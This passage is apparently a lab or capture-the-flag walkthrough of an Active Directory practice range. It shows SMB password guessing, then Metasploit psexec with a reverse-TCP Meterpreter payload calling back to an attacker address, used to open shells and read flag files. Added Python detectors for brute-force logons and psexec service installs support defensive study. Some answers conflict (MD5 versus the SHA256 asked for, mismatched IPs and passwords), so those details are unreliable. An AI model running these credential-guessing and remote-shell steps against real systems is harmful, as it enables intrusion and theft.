[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:cpent123456',
[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:cpentpw',
[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:admin',
[-] 172.16.170.20:445     - 172.16.170.20:445 - Failed: '.\administrator:admin123',
[+] 172.16.170.20:445     - 172.16.170.20:445 - Success: '.\administrator:Pa$$w0rd123456' Administrator
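Every credential-guessing run on this page (hydra and medusa against .90, smb_login against .20) produces the same footprint on the target: a burst of failed network logons (Security event 4625, logon type 3) from one source, followed by one success (4624) once the right password is reached. The script below is an added example, not from the original post: it parses constructed Security-log lines (timestamp, event id, account, source IP, logon type, NTSTATUS) and raises three kinds of alert, using thresholds and a time window that are my own choices. The sample includes the per-account pattern from the smb_login run, a spray across several accounts, the success for aspen, and an interactive logon that must be ignored.

```python
"""Detect password guessing against SMB from Windows Security log events.
Added example; not part of the original post."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: time, event id, account, source ip, logon type,
# status. 4625 = failed logon, 4624 = successful logon; logon type 3 =
# network (SMB); 0xC000006D = unknown user name or bad password.
SAMPLE_EVENTS = """\
2023-04-23T01:18:00 4625 administrator 192.168.200.7 3 0xC000006D
2023-04-23T01:18:01 4625 administrator 192.168.200.7 3 0xC000006D
2023-04-23T01:18:01 4625 administrator 192.168.200.7 3 0xC000006D
2023-04-23T01:18:02 4625 administrator 192.168.200.7 3 0xC000006D
2023-04-23T01:18:02 4625 administrator 192.168.200.7 3 0xC000006D
2023-04-23T01:18:03 4625 administrator 192.168.200.7 3 0xC000006D
2023-04-23T01:18:10 4625 alice 192.168.200.7 3 0xC000006D
2023-04-23T01:18:10 4625 bob 192.168.200.7 3 0xC000006D
2023-04-23T01:18:11 4625 carol 192.168.200.7 3 0xC000006D
2023-04-23T01:18:11 4625 dave 192.168.200.7 3 0xC000006D
2023-04-23T01:18:12 4625 erin 192.168.200.7 3 0xC000006D
2023-04-23T01:18:12 4625 aspen 192.168.200.7 3 0xC000006D
2023-04-23T01:18:13 4624 aspen 192.168.200.7 3 0x0
2023-04-23T01:30:00 4625 jdoe 10.0.0.5 2 0xC000006D
2023-04-23T01:30:30 4624 jdoe 10.0.0.5 2 0x0
"""


def parse_events(text):
    """Turn the simplified log lines into dicts."""
    events = []
    for line in text.splitlines():
        ts, eid, user, src, ltype, status = line.split()
        events.append({"time": datetime.fromisoformat(ts), "id": int(eid),
                       "user": user.lower(), "src": src,
                       "type": int(ltype), "status": status})
    return events


def detect(events, window=timedelta(minutes=5), per_user=5, spray_users=5):
    """Return (alert_type, source_ip, detail) tuples.

    brute_force: >= per_user failures against one account from one source
                 inside the window.
    spray:       one source failing against >= spray_users distinct accounts.
    success_after_failures: a network logon success from a source that
                 already produced failures in the window (the hydra hit)."""
    alerts = []
    fails = defaultdict(list)   # source ip -> [(time, account)] of failures
    flagged = set()             # suppress duplicate alerts per source
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["type"] != 3:     # network logons only (SMB, WinRM, ...)
            continue
        src = ev["src"]
        # Keep only failures still inside the sliding window.
        recent = [(t, u) for t, u in fails[src] if ev["time"] - t <= window]
        fails[src] = recent
        if ev["id"] == 4625:
            recent.append((ev["time"], ev["user"]))
            per_account = sum(1 for _, u in recent if u == ev["user"])
            distinct = {u for _, u in recent}
            key = ("brute_force", src, ev["user"])
            if per_account >= per_user and key not in flagged:
                flagged.add(key)
                alerts.append(key)
            if len(distinct) >= spray_users and ("spray", src) not in flagged:
                flagged.add(("spray", src))
                alerts.append(("spray", src, f"{len(distinct)} accounts"))
        elif ev["id"] == 4624 and recent:
            alerts.append(("success_after_failures", src, ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The third alert type is the one worth paging on: a success from a source that has just generated a run of failures means a guessed password is now in use, which is the moment the psexec session on this page begins. Lowering BRUTEFORCE_SPEED or spreading attempts across sources defeats the counters but not the success-after-failures correlation, as long as the window is wide enough.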

With the password guessed, find a module that can run a shell over SMB; it is number 4 below:

msf6 auxiliary(scanner/smb/smb_login) > search psexec

Matching Modules
================

   #   Name                                         Disclosure Date  Rank       Check  Description
   -   ----                                         ---------------  ----       -----  -----------
   0   auxiliary/scanner/smb/impacket/dcomexec      2018-03-19       normal     No     DCOM Exec
   1   exploit/windows/smb/ms17_010_psexec          2017-03-14       normal     Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2   auxiliary/admin/smb/ms17_010_command         2017-03-14       normal     No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3   auxiliary/scanner/smb/psexec_loggedin_users                   normal     No     Microsoft Windows Authenticated Logged In Users Enumeration
   4   exploit/windows/smb/psexec                   1999-01-01       manual     No     Microsoft Windows Authenticated User Code Execution
   5   auxiliary/admin/smb/psexec_ntdsgrab                           normal     No     PsExec NTDS.dit And SYSTEM Hive Download Utility
   6   exploit/windows/local/current_user_psexec    1999-01-01       excellent  No     PsExec via Current User Token
   7   encoder/x86/service                                           manual     No     Register Service
   8   auxiliary/scanner/smb/impacket/wmiexec       2018-03-19       normal     No     WMI Exec
   9   exploit/windows/smb/webexec                  2018-10-24       manual     No     WebExec Authenticated User Code Execution
   10  exploit/windows/local/wmi                    1999-01-01       excellent  No     Windows Management Instrumentation (WMI) Remote Command Execution


Interact with a module by name or index. For example info 10, use 10 or use exploit/windows/local/wmi

msf6 auxiliary(scanner/smb/smb_login) > use 4
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set rhosts 172.16.170.20
rhosts => 172.16.170.20
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass Pa$$w0rd123456
smbpass => Pa$$w0rd123456
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.200.7:5555
[*] 172.16.170.20:445 - Connecting to the server...
[*] 172.16.170.20:445 - Authenticating to 172.16.170.20:445 as user 'administrator'...
[*] 172.16.170.20:445 - Selecting PowerShell target
[*] 172.16.170.20:445 - Executing the payload...
[+] 172.16.170.20:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 172.16.170.20
[*] Meterpreter session 3 opened (192.168.200.7:5555 -> 172.16.170.20:63375) at 2023-04-02 01:46:14 -0400

meterpreter >

With a shell obtained, the challenges below can be solved. First use help to see which commands are available, then enter the shell command to use Windows cmd directly:

Challenge 10:

What is the last four hex numbers for the hash of adminflag.txt file on machine 172.25.170.20? (Hint: SHA256 Hash) Ans: 3c18

meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bg            Alias for background
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information or control active channels
    close         Closes a channel
    detach        Detach the meterpreter session (for http/https)
    disable_unic  Disables encoding of unicode strings
    ode_encoding
    enable_unico  Enables encoding of unicode strings
    de_encoding
    exit          Terminate the meterpreter session
    get_timeouts  Get the current session timeout values
    guid          Get the session GUID
    help          Help menu
    info          Displays information about a Post module
    irb           Open an interactive Ruby shell on the current session
    load          Load one or more meterpreter extensions
    machine_id    Get the MSF ID of the machine attached to the session
    migrate       Migrate the server to another process
    pivot         Manage pivot listeners
    pry           Open the Pry debugger on the current session
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    resource      Run the commands stored in a file
    run           Executes a meterpreter script or Post module
    secure        (Re)Negotiate TLV packet encryption on the session
    sessions      Quickly switch to another session
    set_timeouts  Set the current session timeout values
    sleep         Force Meterpreter to go quiet, then re-establish session
    ssl_verify    Modify the SSL certificate verification setting
    transport     Manage the transport mechanisms
    use           Deprecated alias for "load"
    uuid          Get the UUID for the current session
    write         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    enumdesktops  List all accessible desktops and window stations
    getdesktop    Get the current meterpreter desktop
    idletime      Returns the number of seconds the remote user has been idle
    keyboard_send Send keystrokes
    keyevent      Send key events
    keyscan_dump  Dump the keystroke buffer
    keyscan_start Start capturing keystrokes
    keyscan_stop  Stop capturing keystrokes
    mouse         Send mouse events
    screenshare   Watch the remote user desktop in real time
    screenshot    Grab a screenshot of the interactive desktop
    setdesktop    Change the meterpreters current desktop
    uictl         Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_chat   Start a video chat
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam
    webcam_stream Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter > shell
Process 5612 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.2114]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd /
cd /

C:\>cd users
cd users

C:\Users>cd administrator
cd administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 689D-43B7

 Directory of C:\Users\Administrator

10/15/2022  08:09 AM    <DIR>          .
10/15/2022  08:09 AM    <DIR>          ..
10/14/2022  03:49 AM    <DIR>          3D Objects
10/15/2022  08:09 AM                10 adminflag.txt.txt
10/14/2022  03:49 AM    <DIR>          Contacts
10/14/2022  03:49 AM    <DIR>          Desktop
10/14/2022  03:49 AM    <DIR>          Documents
10/14/2022  03:49 AM    <DIR>          Downloads
10/14/2022  03:49 AM    <DIR>          Favorites
10/14/2022  03:49 AM    <DIR>          Links
10/14/2022  03:49 AM    <DIR>          Music
10/14/2022  03:49 AM    <DIR>          Pictures
10/14/2022  03:49 AM    <DIR>          Saved Games
10/14/2022  03:49 AM    <DIR>          Searches
10/14/2022  03:49 AM    <DIR>          Videos
               1 File(s)             10 bytes
              14 Dir(s)  124,500,250,624 bytes free

C:\Users\Administrator>exit
exit
meterpreter > search -f *adminflag*
Found 2 results...
==================

Path                                                                                     Size (bytes)  Modified (UTC)
----                                                                                     ------------  --------------
c:\Users\Administrator\adminflag.txt.txt                                                 10            2022-10-15 11:09:24 -0400
c:\Users\administrator.CPENT\AppData\Roaming\Microsoft\Windows\Recent\adminflag.txt.lnk  859           2022-10-15 11:09:13 -0400

meterpreter > checksum md5 c:\\Users\\Administrator\\adminflag.txt.txt
f714934c963e839b03afe276cf9d3c18  c:\Users\Administrator\adminflag.txt.txt

Here the meterpreter command search -f *string* found an adminflag whose file name differs from the one given in the question; * is a wildcard, so it matches any characters. The last four hex digits of the MD5 are 3c18. The file content is:

meterpreter > cat c:\Users\Administrator\adminflag.txt.txt
AD_2019-DC

Generate All Hashes - MD5, SHA1, SHA3, CRC32 - Online - Browserling Web Developer Tools

From the Browserling hash generator linked above, the SHA-256 ends in 09c5.

Challenge 11:

What is the contents of the adminflagBRAVO.txt at machine 172.25.170.70?

TODO: how to brute-force this?

Since brute-forcing did not work when I tried it, I simply reused the SMB credentials that were cracked earlier.

msf6 exploit(windows/smb/psexec) > set lport 6666
lport => 6666
msf6 exploit(windows/smb/psexec) > set rhosts 172.16.170.70
rhosts => 172.16.170.70
msf6 exploit(windows/smb/psexec) > set smbpass Pa$$w0rd123
smbpass => Pa$$w0rd123
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                172.16.170.70    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               Pa$$w0rd123      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               administrator    no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.200.7    yes       The listen address (an interface may be specified)
   LPORT     6666             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.200.7:6666
[*] 172.16.170.70:445 - Connecting to the server...
[*] 172.16.170.70:445 - Authenticating to 172.16.170.70:445 as user 'administrator'...
[*] 172.16.170.70:445 - Selecting PowerShell target
[*] 172.16.170.70:445 - Executing the payload...
[+] 172.16.170.70:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 172.16.170.70
[*] Meterpreter session 4 opened (192.168.200.7:6666 -> 172.16.170.70:61505) at 2023-04-02 02:28:11 -0400

meterpreter >
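As an added defender-side example (not part of the original post), here is a small Python detector run over constructed Event ID 7045 records that flags the kind of service install a psexec-style PowerShell launcher leaves behind; the binary-path pattern, the 8-letter service-name heuristic and the sample records are assumptions, not values taken from the session above.

```python
import base64
import re

# Constructed sample records (not from the original post) shaped like Windows
# System-log Event ID 7045 ("A service was installed in the system"). The second
# mimics the artifact commonly attributed to Metasploit psexec's PowerShell
# target: a random service name launching encoded PowerShell via %COMSPEC% (assumption).
ENCODED_CMD = base64.b64encode("write-host hi".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "W32Time", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Windows\system32\svchost.exe -k LocalService"},
    {"EventID": 7045, "ServiceName": "wMKQpRJz", "AccountName": "LocalSystem",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e " + ENCODED_CMD},
    {"EventID": 7036, "ServiceName": "wMKQpRJz", "State": "stopped"},  # ignored
]

# Detection heuristics; thresholds are assumptions to tune per environment.
RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")
ENCODED_PS = re.compile(
    r"powershell(?:\.exe)?\b.*?\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE)


def decode_encoded_command(blob):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE)."""
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def flag_psexec_like_services(events):
    """One finding per 7045 event whose binary path looks like a psexec-style launcher."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 7045:
            continue  # only service-install events are of interest here
        path = ev.get("ImagePath", "")
        reasons = []
        if "%COMSPEC%" in path.upper():
            reasons.append("launched via %COMSPEC%")
        if match := ENCODED_PS.search(path):
            reasons.append("encoded PowerShell command in binary path")
        if not reasons:
            continue  # a random-looking name alone is not enough to alert on
        if RANDOM_NAME.match(ev.get("ServiceName", "")):
            reasons.append("random-looking 8-letter service name")
        findings.append({"service": ev["ServiceName"], "reasons": reasons,
                         "decoded": decode_encoded_command(match.group(1)) if match else None})
    return findings
```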

Using the same command as in the previous challenge to find the flag, we get SERVER2008-ADDC:

meterpreter > search *adminflagBRAVO*
[-] You must specify a valid file glob to search for, e.g. >search -f *.doc
meterpreter > search -f *adminflagBRAVO*
Found 2 results...
==================

Path                                                                                      Size (bytes)  Modified (UTC)
----                                                                                      ------------  --------------
c:\Users\administrator.CPENT\AppData\Roaming\Microsoft\Windows\Recent\adminflagBRAVO.lnk  2643          2022-10-15 11:03:27 -0400
c:\Users\administrator.CPENT\Documents\adminflagBRAVO.txt                                 15            2022-10-15 11:03:32 -0400

meterpreter > cat "c:\Users\administrator.CPENT\Documents\adminflagBRAVO.txt"
SERVER2008-ADDC

End of the AD range.
